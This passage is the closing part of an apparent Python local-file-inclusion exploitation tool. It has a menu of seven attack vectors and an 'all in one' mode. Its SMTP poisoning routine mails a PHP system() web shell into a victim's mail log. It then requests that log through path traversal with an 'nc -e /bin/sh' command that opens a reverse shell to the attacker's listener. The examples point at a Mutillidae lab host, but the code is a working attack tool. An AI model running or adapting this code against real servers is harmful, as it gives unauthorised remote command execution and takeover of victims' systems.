798 |         a1212 = requests.post(link,headers=coki,data=login)
799 |         b1212 = a1212.request.headers
800 |         c1212 = requests.get(link2)
801 |     elif ncccc == "n":
802 |         print("Put the command...")
803 |     else:
804 |         print("Invalid Option")
805 | 
806 | 
807 | def smtp_poisoning():
808 |     print(linea)
809 |     urllllll = input("Put URL of mail logs file (Example http://192.168.0.125/mutillidae/?page=/../../../var/log/mail): ")
810 |     ip_l_meva = input("Put your Local Ip: ")
811 |     os.system('gnome-terminal')
812 |     print("Put the command (nc -vv -l -p 1212) in new terminal!")
813 |     print(linea)
814 |     penerudo = str.lower(input("You put the command (nc -vv -l -p 1212) in new terminal?   y/n: "))
815 |     if penerudo == "y":
816 |         tarrrjet = str(input("Put server Victim IP: "))
817 |         email = "s12deff@gmail.com"
818 |         port_smtp = input("Put port of SMTP Server (default 25): ")
819 |         if not port_smtp:
820 |             port_smtp = 25
821 |         payload = "?php system($_GET['s12']);?"
822 |         client = TelnetMail(tarrrjet, port= port_smtp, from_=email, to=["?php system($_GET['s12']);?","s12deff@gmail.com"], message="H4CKED")
823 |         client.send_mail()
824 | 
825 |         print(repr(client))
826 |         print(client)
827 |         print(client.responses.decode())
828 |         url_ultima_last = urllllll + '&s12= nc -e /bin/sh ' + ip_l_meva + ' 1212'
829 |         print(url_ultima_last)
830 |         requests.get(url_ultima_last)
831 |     elif penerudo == "n":
832 |         print("Put the command...")
833 |     else:
834 |         print("Invalid option")
835 |     
836 |     
837 | 
838 | def all_in_one():
839 |     print(linea)
840 |     print("First attack vector initializing...")
841 |     os.system("gnome-terminal")
842 |     print("Execute this command in the new terminal:\nnc -vv -l -p 1212")
843 |     print(linea)
844 |     global url_exploitation
845 |     url_exploitation = input("Put URL: \n(Example: http://192.168.0.125/mutillidae/?page=)\nURL: ")
846 |     proc_self_environ()
847 |     print(linea)
848 |     print("Second attack vector initializing...")
849 |     var_log_auth()
850 |     print(linea)
851 |     print("Third attack vector initializing...")
852 |     posioning_apache()
853 |     print(linea)
854 |     print("Fourth attack vector initializing...")
855 |     input_php()
856 |     print(linea)
857 |     print("Fifth attack vector initializing...")
858 |     sesion_cookies()
859 |     print(linea)
860 |     print("Sixth attack vector initializing...")
861 |     data_wrapper()
862 |     print(linea)
863 |     print("Seventh attack vector initializing...")
864 |     smtp_poisoning()
865 | 
866 | 
867 | 
868 | 
869 | def exploitation():
870 |     print("This are all the vectors of attack")
871 |     pregunta22 = input("1- /proc/self/environ\n2- /var/log/auth.log\n3- Apache Log Poisoning\n4- php://input\n5- Php Sessions and Cookies\n6- Data Wrapper\n7- SMTP Poisoning\n8- All attacks in one\nOption: ")
872 |     if pregunta22 == "1":
873 |         os.system("gnome-terminal")
874 |         print("Execute this command in the new terminal:\nnc -vv -l -p 1212")
875 |         print(linea)
876 |         global url_exploitation
877 |         url_exploitation = input("Put URL: \n(Example: http://192.168.0.125/mutillidae/?page=)\nURL: ")
878 |         proc_self_environ()
879 |     elif pregunta22 == "2":
880 |         var_log_auth()
881 |     elif pregunta22 == "3":
882 |         posioning_apache()
883 |     elif pregunta22 == "4":
884 |         input_php()
885 |     elif pregunta22 == "5":
886 |         sesion_cookies()
887 |     elif pregunta22 == "6":
888 |         data_wrapper()
889 |     elif pregunta22 == "7":
890 |         smtp_poisoning()
891 |     elif pregunta22 == "8":
892 |         all_in_one()
893 |     else:
894 |         print("Invalid option")
895 | 
896 | 
897 | def choose():
898 |     print("What you want to do?\n 1- Scanner LFI Vulnerabilitie\n 2- Exploit LFI Vulnerabilitie\n 3- Victim Info")
899 |     pregunta = int(input("Option: "))
900 |     print(linea)
901 |     if pregunta == 1:
902 |         pregunta2 = int(input("1- Scan \n2- Scan + Add File to scan\nOption: "))
903 |         if pregunta2 == 1:
904 |             scanner()
905 |             print(linea,"----------------")
906 |             print("If all are negative Try to go in",final_url)
907 |         elif pregunta2 == 2:
908 |             scanner()
909 |             scanner_add()
910 |     elif pregunta == 2:
911 |         exploitation()
912 |     elif pregunta == 3:
913 |         info()
914 |     
915 |     
916 |     
917 | choose()


--------------------------------------------------------------------------------